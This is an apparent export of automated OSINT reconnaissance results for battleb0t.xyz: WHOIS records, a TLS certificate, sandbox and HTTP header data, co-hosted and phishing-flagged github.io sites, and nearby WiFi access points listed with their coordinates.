| 2023-05-12 02:45:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 14, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://k8slens.dev/index.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:5804:304:WilStaging_02"\n "Local\\SM0:5804:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:5804:120:WilError_01"\n "Local\\SM0:5804:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "138.91.254.96:443"\n "142.250.188.10:443"\n "142.251.46.227:443"\n "34.248.78.39:443"\n "192.30.255.117:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.github.com"\n "api.k8slens.dev"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "k8slens.dev"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<a class="dropdown-item" href="https://twitter.com/k8slens">TWITTER</a>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n file/memory contains long string with (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">Loving <a href="https://twitter.com/k8slens">@k8slens</a> a great OSS tool for k8s </p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/andystopford/status/1364158215466987522"><i class="fab fa-twitter"></i> Dec 8, 2020</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">I\'ve shared it already, but I want to say again that I\'m real happy I found <a href="https://twitter.com/k8slens">@k8slens</a> for Kubernetes work. 
Makes it much more convenient, especially when juggling multiple clusters!</p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/TheBlondeBass/status/1374379945380605955"><i class="fab fa-twitter"></i> Mar 23, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/chriskalmar/status/1354878064698789901"><i class="fab fa-twitter"></i> Jan 28, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/hueythewookiee/status/1366084768073474048"><i class="fab fa-twitter"></i> Feb 28, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">Today I just discovered <a href="https://twitter.com/k8slens">@k8slens</a> and I am blown away how helpful this tool is. The open source community is amazing!</p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/jaydrogers/status/1363986936222908416"><i class="fab fa-twitter"></i> Feb 23, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text">Can\'t imagine working without <a href="https://twitter.com/k8slens">@k8slens</a> again. It saves so much time when debugging. Awesome tool! 
<span class="hashtag">#Kubernetes</span></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/kj187/status/1378030896478048263"><i class="fab fa-twitter"></i> Apr 2, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")\n Found string "<p class="card-text"><small class="text-muted"><a href="https://twitter.com/matfsw/status/1352561119983005702"><i class="fab fa-twitter"></i> Jan 22, 2021</small></a></p>" (Indicator: "dir "; File: "urlref_httpsk8slens.devindex.html")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n 
"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006220]\n "f_0004cb" has type "PNG image data 1920 x 1200 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006788]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00006788]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00006788]\n "7535c146-9755-4ec6-9716-07311086f816.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 33561"- Location: [%TEMP%\\7535c146-9755-4ec6-9716-07311086f816.tmp]- [targetUID: 00000000-00006788]\n "f_0004db" has type "PNG image data 2384 x 1453 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004db]- [targetUID: 00000000-00006220]\n "f_0004dc" has type "PNG image data 2048 x 
1024 8-bit grayscale non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004dc]- [targetUID: 00000000-00006220]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "f_0004ca" has type "PNG image data 800 x 800 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004ca]- [targetUID: 00000000-00006220]\n "f_0004c9" has type "gzip compressed data from Unix original size modulo 2^32 1043324"- [targetUID: N/A]\n "f_0004da" has type "PNG image data 400 x 400 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006220]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006220]\n "f_0004c8" has type "PNG image data 500 x 500 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c8]- [targetUID: 00000000-00006220]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006788]\n | 185.199.111.153 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5eacee2fce86e1-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:33:35 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html>
<head>
<title>Page Not Found</title>
<style>
</style>
</head>
<body>
<h1>Page Not Found</h1>
</div>
<p>Looks like you've followed a broken link or entered a URL that doesn't exist on this site.</p>
<p>
</svg>
Back to our site
</a>
</p>
</p>
</div>
</div>
</div>
<script>
</script>
</body>
</html>
| https://pics.battleb0t.xyz/images/withat_5.jpg |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 001328.github.io |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | gclabc (Net ID: 00:0B:86:22:0F:31) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D8:FE) | 32.8608, -79.9746 |
| 2023-05-12 02:44:19 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@support.gandi.net | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000b000.github.io |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetA41A (Net ID: 00:01:36:57:A4:18) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Best Western Lobby (Net ID: 00:02:2D:66:D4:75) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Git (software) | cdn-185-199-111-153.github.com |
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:46:f1:1e:e1:9f:06:66:b4:a8:76:85:82:4c:61:2f:de:37:
70:5e:a3:ab:ce:31:a5:e4:63:10:5d:02:f9:ef:bd:c4:11:85:
80:6c:fc:c5:84:b0:c5:6b:a0:c4:07:ac:78:f3:1f:48:7e:f7:
86:c2:2f:cf:18:f5:92:dd:9a:51:6a:86:ae:51:1d:75:24:9f:
d6:b2:e6:73:f5:1b:4b:e1:d9:79:e3:8c:6d:d9:f5:09:8b:04:
13:69:59:dc:c2:b8:16:59:fc:4b:dd:d4:70:53:86:d9:46:1f:
4d:75:2f:f5:5d:24:f4:03:69:e5:72:06:59:2d:70:8b:88:1b:
c1:6e:20:f4:5c:2c:e2:e1:c4:72:50:4a:c0:18:b3:d8:69:e9:
db:ae:5d:67:ee:07:2b:bd:14:58:30:61:50:1a:c8:bf:41:ea:
16:f9:d3:c8:60:89:41:8f:2e:74:af:3d:af:75:1d:3b:a1:aa:
eb:1e:d5:15:4a:21:6f:8c:e6:17:0c:be:34:82:b6:75:05:7b:
8e:d6:da:74:1c:32:3b:c5:5e:fc:60:88:85:77:b4:ca:57:ff:
3c:36:de:a9:4f:dc:93:d8:f4:d4:75:d4:5f:6c:78:5c:f7:cb:
36:fe:04:b5:16:3b:bd:9f:a9:99:de:01:fa:7f:2c:28:60:7e:
4a:61:2b:70
|
| 2023-05-12 03:43:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 87.248.157.79:443 | 87.248.157.0/24 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000yesnt.github.io]
https://www.openphish.com/feed.txt | 000yesnt.github.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Houzz (Category: hobby)
https://www.houzz.com/user/login | login |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs (Net ID: 00:06:B1:28:66:65) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:33:59 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
? `sm
b"0N9
3@N:vn
yj4BZu:-
pqmVU
hEC0s
c@ h'
6FcPkh4
2:Eu`
IDAT
nfwPH
jniEDkf
9uCGxN
MWFGv
'!hXQf
6WoW'
hRoWW
68ZQ$
8Ro7Tr
2j3yrN
nkumI'N
rVKjW
icsI3
dc:YL
JU5sF
O::vH
BlH_0
xHnU6
:9sGc
LB7R1
\T.sL
T.TM`
/kyyE
NjttD
Z \$@
_495P
trtT'cq
yf4:6
5?O@nY
.LRMj9o
dx.>_
"P/9l
1i5b>
d<'uj
JG077/
4NmT4 2
2d9L
B?mju
VWom
<F0b-R
PMc7d6d?
Z`sX10
tXB0Zn
blFM!
FpL3K
0o!Sc
6DfD0
IDATG`
D2Yi2e
wgxsu.
sx<C3
P?AF5
N1dcyzL
6dT\D
xTPT'
" mE\
DpW-Q
8NZeS
SIc@x
oJj'sN??
``xvl
BR8Jtu
waVm'
8 Jkd
55j1T
i5Vn
heH_>
yy60A
j1ENS
uHcBj
VCAKa
v-v7i
T/T.lF
IDAT>
5zqxE?
dUJ77
8_seE
"gJs5UxZ
p9Rn:
f2`q?
r4SvF
05sFG-
7mecE
`tNP6
><HQT
s9v54
!c>0
MRmC"
Pp@e9_ | https://funny.battleb0t.xyz/images/ein_2.png |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:A4:B5:6C) | 50.8897, 6.0563 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Piekielni (Category: misc)
https://piekielni.pl/user/login | login |
